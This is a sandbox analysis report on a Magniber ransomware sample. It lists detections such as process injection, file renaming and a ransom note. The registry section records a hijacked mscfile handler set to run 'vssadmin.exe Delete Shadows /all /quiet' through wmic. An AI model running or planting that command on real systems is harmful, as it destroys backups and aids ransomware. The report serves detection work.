Malware Analysis Report

2025-01-22 20:47

Sample ID 241206-eywkmszmc1
Target cb0261d9a3e77ffecdb51914b3690f18_JaffaCakes118
SHA256 b8509f34589fa23a5d2db7d84b70a351f8bf928a789b45f0f10168b48319ecb9
Tags
magniber defense_evasion discovery execution impact ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b8509f34589fa23a5d2db7d84b70a351f8bf928a789b45f0f10168b48319ecb9

Threat Level: Known bad

The file cb0261d9a3e77ffecdb51914b3690f18_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

magniber defense_evasion discovery execution impact ransomware

Magniber family

Magniber Ransomware

Process spawned unexpected child process

Detect magniber ransomware

Renames multiple (62) files with added filename extension

Renames multiple (83) files with added filename extension

Deletes shadow copies

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Browser Information Discovery

Unsigned PE

Enumerates physical storage devices

Suspicious use of UnmapMainImage

Opens file in notepad (likely ransom note)

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-06 04:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-06 04:21

Reported

2024-12-06 04:23

Platform

win7-20240708-en

Max time kernel

147s

Max time network

140s

Command Line

"taskhost.exe"

Signatures

Detect magniber ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Magniber Ransomware

ransomware magniber

Magniber family

magniber

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (83) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L2BFB2JG\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MYC3PENY\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9C9T5AL\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROVWYKHE\desktop.ini C:\Windows\system32\DllHost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2000 set thread context of 1124 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\taskhost.exe
PID 2000 set thread context of 1176 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\Dwm.exe
PID 2000 set thread context of 1272 N/A C:\Windows\system32\rundll32.exe C:\Windows\Explorer.EXE
PID 2000 set thread context of 1228 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\DllHost.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9010aa6d9647db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "439620768" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{974120B1-B389-11EF-98DB-E29800E22076} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002aa6f01a5c1dec4887259b29e600834400000000020000000000106600000001000020000000a9286878baf07c76c16d0c68eb011e8ce771ca7a2a86e19602269d5b8fc9d16b000000000e8000000002000020000000bae38a9e534b728992c3902a3553cd0e853427c9e6aa66823cd9e94a4832a9cb90000000b7add1088e1f1bedd8106a7e4f37fbe4738114b2c9c244f082a47fee6ee661630de8a6c0d72c32ce1df9b256f21ec59dcd5da68afc94ad25f202f698acf7dc3f7c3129bbc22c7176d0c56e1cc8962bb05e8cef39994b74d7037a46867c5ac5b063414c3a025dad27c4d6b4ac5ceb669cf6c55fde609910b4b2eaca9b5d4bd2966068acba8e3caac9c253a73c5130f5054000000006404a1f84072e88a0f6dbc4afeeb9f56f47289ec4bd9cf6a85795b72c422da02997808a20ce6037b1c9831330cec26a807dee334279738736379c3f9a1253ad C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002aa6f01a5c1dec4887259b29e600834400000000020000000000106600000001000020000000caabd442e08e7a423e9f5a0662a88cc5a73aeec7ce3e757ce4806c83eeb5993d000000000e80000000020000200000009a347bf2f3967c8d28a7094423e36992baf0311bc8680e6d49748e4fd89007e82000000097be3dcc74b283f9a3a15604308a78e4183c00dd675d5b470f6d2739effeab8d4000000026e05953be2f6308720945ab2ae3f05da1eb50595cdba1d715e502050f5e1d7489fb0901190223fb5c7d08feba9a25b21507bbfcab0b923531bb394b691f08c0 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open C:\Windows\system32\DllHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\taskhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\Dwm.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\Dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell C:\Windows\system32\DllHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\taskhost.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1228 wrote to memory of 1780 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\notepad.exe
PID 1228 wrote to memory of 1780 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\notepad.exe
PID 1228 wrote to memory of 1780 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\notepad.exe
PID 1228 wrote to memory of 2368 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\cmd.exe
PID 1228 wrote to memory of 2368 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\cmd.exe
PID 1228 wrote to memory of 2368 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\cmd.exe
PID 1228 wrote to memory of 1880 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\wbem\wmic.exe
PID 1228 wrote to memory of 1880 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\wbem\wmic.exe
PID 1228 wrote to memory of 1880 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\wbem\wmic.exe
PID 1228 wrote to memory of 2516 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\cmd.exe
PID 1228 wrote to memory of 2516 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\cmd.exe
PID 1228 wrote to memory of 2516 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\cmd.exe
PID 2516 wrote to memory of 1488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2516 wrote to memory of 1488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2516 wrote to memory of 1488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2368 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2368 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2368 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 380 wrote to memory of 2756 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 380 wrote to memory of 2756 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 380 wrote to memory of 2756 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 380 wrote to memory of 2756 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2892 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2892 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2892 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2764 wrote to memory of 1072 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2764 wrote to memory of 1072 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2764 wrote to memory of 1072 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1272 wrote to memory of 2472 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1272 wrote to memory of 2472 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1272 wrote to memory of 2472 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1272 wrote to memory of 1920 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1272 wrote to memory of 1920 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1272 wrote to memory of 1920 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1920 wrote to memory of 2328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1920 wrote to memory of 2328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1920 wrote to memory of 2328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 876 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 876 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 876 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2572 wrote to memory of 344 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2572 wrote to memory of 344 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2572 wrote to memory of 344 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2000 wrote to memory of 1708 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\wbem\wmic.exe
PID 2000 wrote to memory of 1708 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\wbem\wmic.exe
PID 2000 wrote to memory of 1708 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\wbem\wmic.exe
PID 2000 wrote to memory of 1908 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 1908 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 1908 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1908 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1908 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 220 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 220 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 220 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2816 wrote to memory of 1144 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2816 wrote to memory of 1144 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2816 wrote to memory of 1144 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
